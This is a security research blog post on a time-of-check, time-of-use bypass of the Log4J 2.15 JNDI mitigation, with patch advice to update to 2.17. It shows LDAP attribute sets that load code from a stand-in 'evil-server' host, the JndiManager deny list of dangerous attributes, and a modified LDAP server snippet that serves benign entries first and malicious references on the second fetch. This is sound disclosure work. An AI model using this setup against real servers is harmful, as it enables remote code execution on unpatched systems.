Urgences 24 sur 7 – (888) 287-5858   Connexion au Portail TitanSupport    Contactez-nous      Blogue

Log4J has been in the spotlight for the past two weeks for a new attack vector which relies on Java Naming and Directory Interface (JNDI). Log4J 2.15 vulnerabilities are now considered high severity (9.0). And as the GoSecure research team investigated, we realized that the mitigations implemented were incomplete.

In this blog, we will detail the new mitigation introduced in 2.15 and the bypass we found using a Time of Check, Time of Use vulnerability (TOCTOU). This vector was also discovered independently by Alvaro Muñoz and Tony Torralba. It is likely that many other individuals have reported related bypass techniques because there were multiple weaknesses in the same Java class (JndiManager).

During this time, Log4J has received multiple security updates and GoSecure has been working across our portfolio of products and services to support our clients who may be affected. We recommend everyone update to the latest version 2.17 for the best available protection. For further information about Log4Shell’s impact, visit our blog on mitigation and remediation. Information about the status of our products is available here.

Log4Shell

 

Version affected

Before we dive into the code, we should clarify that only Log4J version 2.15 and below are vulnerable and only if lookups are enabled for backward compatibility. The JNDI lookup feature was still included in 2.15 and additional checks were made to prevent malicious LDAP attributes when the feature is enabled. These new validations fell short due to a Time of Check, Time of Use vulnerability (TOCTOU).

 

JndiManager validations

The class JndiManager is wrapping the lookup for JNDI which can cause some unexpected code execution specifically if RMI, IIOP or LDAP are used. In Log4J 2.15, RMI and IIOP are not included in the protocol allowlist verification leaving only the LDAP protocol to be used.

Multiples LDAP attribute combinations can be used to trigger code execution. Here are two combinations as described in RFC2713.

  1. Factory class

With the previous attributes, the class Log4jRCE is downloaded from http://evil-server/Log4jRCE.class and instantiated.

  1. Serializedobject
    • javaClassName: MaliciousGadget
    • javaSerializedData: ACED01A[….]
    • javaCodeBase: http://evil-server/

Based on the previous, JDNI LDAP context will deserialize the data presented in the field javaSerializedData.

When Log4J received the report for the JNDI lookup injection they decided to validate the LDAP entries fetched. For this reason, the name “javaSerializedData”, “javaClassName”, “javaReferenceAddress” and “javaFactory” were added to an attributes deny list in JndiManager.

 
JndiManager.java

Map<String, Attribute> attributeMap = new HashMap<>();

NamingEnumeration<? extends Attribute> enumeration = attributes.getAll();
while (enumeration.hasMore()) {
    Attribute attribute = enumeration.next();
    attributeMap.put(attribute.getID(), attribute);
}

Attribute classNameAttr = attributeMap.get(CLASS_NAME);
if (attributeMap.get(SERIALIZED_DATA) != null) {
    if (classNameAttr != null) {
        String className = classNameAttr.get().toString();
        if (!allowedClasses.contains(className)) {
            LOGGER.warn("Deserialization of {} is not allowed", className);
            return null;
        }
    } else {
        LOGGER.warn("No class name provided for {}", name);
        return null;
    }
} else if (attributeMap.get(REFERENCE_ADDRESS) != null
        || attributeMap.get(OBJECT_FACTORY) != null) {
    LOGGER.warn("Referenceable class is not allowed for {}", name);
    return null;

[...]

} catch (URISyntaxException ex) {
    // This is OK.
}
return (T) this.context.lookup(name);

Ref : Change for LOG4J2-3201

 

The Bypass

The logic, unfortunately, is flawed and it can be bypassed by performing a Time of Check, Time of Use (TOCTOU) attack. You might have found it in the previous code snippet.

Assuming an LDAP entry is fetched using the special expression, the wrapper JndiManager will first load the entry with the method DirContext.getAttributes().

Attributes attributes = this.context.getAttributes(name);

Ref : JndiManager.java#L237

If the entry has no risky attribute, the wrapper proceeds to fetch the entry again. The method used here in the final fetch is DirContext.lookup().

return (T) this.context.lookup(name);

Ref: JndiManager.java#L273

An attacker can create a server that would return regular LDAP attributes (CN, SN, UID, etc.) on the first request and on the second one, return attributes that would trigger Java code execution.

Sequence diagram illustrating the attack

 

How to Reproduce

To confirmed the vulnerability, we customized marshalsec’s LDAPRefServer tool by adding the choice to send malicious or normal payload is selected manually. Of course, this could easily be automated using unique JNDI URL to keep track of the first request and second request made by the vulnerable server.

if(<send malicious entry>) { //Second fetch
    e.addAttribute("javaClassName", "foo");
    String cbstring = this.codebase.toString();
    int refPos = cbstring.indexOf('#');
    if ( refPos > 0 ) {
        cbstring = cbstring.substring(0, refPos);
    }
    e.addAttribute("javaCodeBase", cbstring);
    e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
    e.addAttribute("javaFactory", this.codebase.getRef());

}
else { //First fetch
    e.addAttribute("cn", "Test");
    e.addAttribute("sn", "test");
    e.addAttribute("uid", "test");
    e.addAttribute("telephoneNumber", "123");
}

 

Conclusion

If you update your Log4J library to 2.15, it will not be enough to mitigate all potential remote code execution.  At the moment of this writing, 2.17 is the recommended version. Make sure to read the official Log4J advisory page to get the latest update on the vulnerability. It is worth noting that two other vulnerabilities were found on Log4J 2.15: a Denial of Service (DOS) with ${ctx} expression and a hostname parsing validation bypass that brings back the remote code execution (RCE) vector.

 

References

 

Timeline

  • December 10: Log4j 2.15.0 release (Vulnerable to TOCTOU)
  • December 13: Log4j 2.16.0 release (JNDI fully disabled)
  • December 16: Vulnerability reported by Tony Torralba and Alvaro Muñoz (Ref)
  • December 16: Vulnerability reported by GoSecure
  • December 17: Log4J 2.15 severity raised from 3.7 to 9.0
  • December 18: Log4j 2.17.0 release
  • December 20: Received confirmation that the Log4J team is aware of the TOCTOU.

Détection et réponse gérées et étendues GoSecure TitanMC (MXDR)

Détection et réponse gérées et étendues GoSecure TitanMC (MXDR) Fondation

Gestion des vulnérabilités en tant que service GoSecure TitanMC (VMaaS)

Surveillance des événements liés aux informations de sécurité gérée GoSecure TitanMC (SIEM gérée)

Défense du périmètre gérée GoSecure TitanMC (pare-feu)

Détection et réponse des boîtes de messagerie GoSecure TitanMC (IDR)

Passerelle de messagerie sécurisée GoSecure TitanMC (SEG)

Modélisateur de menaces GoSecure TitanMC

Identity GoSecure TitanMC

Plateforme GoSecure TitanMC

Services de sécurité professionnels de GoSecure

Services de réponse aux incidents

Évaluation de la maturité de la sécurité

Services de confidentialité

Services PCI DSS

Services de piratage éthique

Opérations de sécurité

MicrosoftLogo

GoSecure MXDR pour Microsoft

Visibilité et réponse complètes au sein de votre environnement de sécurité Microsoft

CAS D'UTILISATION

Cyberrisques

Mesures de sécurité basées sur les risques

Sociétés de financement par capitaux propres

Prendre des décisions éclairées

Sécurité des données sensibles

Protéger les informations sensibles

Conformité en matière de cybersécurité

Respecter les obligations réglementaires

Cyberassurance

Une stratégie précieuse de gestion des risques

Rançongiciels

Combattre les rançongiciels grâce à une sécurité innovante

Attaques de type « zero-day »

Arrêter les exploits de type « zero-day » grâce à une protection avancée

Consolider, évoluer et prospérer

Prenez de l'avance et gagnez la course avec la Plateforme GoSecure TitanMC.

24/7 MXDR

Détection et réponse sur les terminaux GoSecure TitanMC (EDR)

Antivirus de nouvelle génération GoSecure TitanMC (NGAV)

Surveillance des événements liés aux informations de sécurité GoSecure TitanMC (SIEM)

Détection et réponse des boîtes de messagerie GoSecure TitanMC (IDR)

Intelligence GoSecure TitanMC

Notre SOC

Défense proactive, 24h/24, 7j/7

À PROPOS DE GOSECURE

GoSecure est un leader et un innovateur reconnu en matière de cybersécurité, pionnier de l'intégration de la détection des menaces au niveau des terminaux, du réseau et des courriels en un seul service de détection et réponse gérées et étendues (MXDR). Depuis plus de 20 ans, GoSecure aide ses clients à mieux comprendre leurs failles en matière de sécurité et à améliorer leurs risques organisationnels ainsi que leur maturité en matière de sécurité grâce aux solutions MXDR et aux services professionnels fournis par l'une des équipes les plus fiables et les plus compétentes de l'industrie.

CALENDRIER D’ÉVÉNEMENTS

DERNIER COMMUNIQUÉ DE PRESSE

BLOGUE GOSECURE

AVIS DE SÉCURITÉ

Urgences 24 sur 7 – (888) 287-5858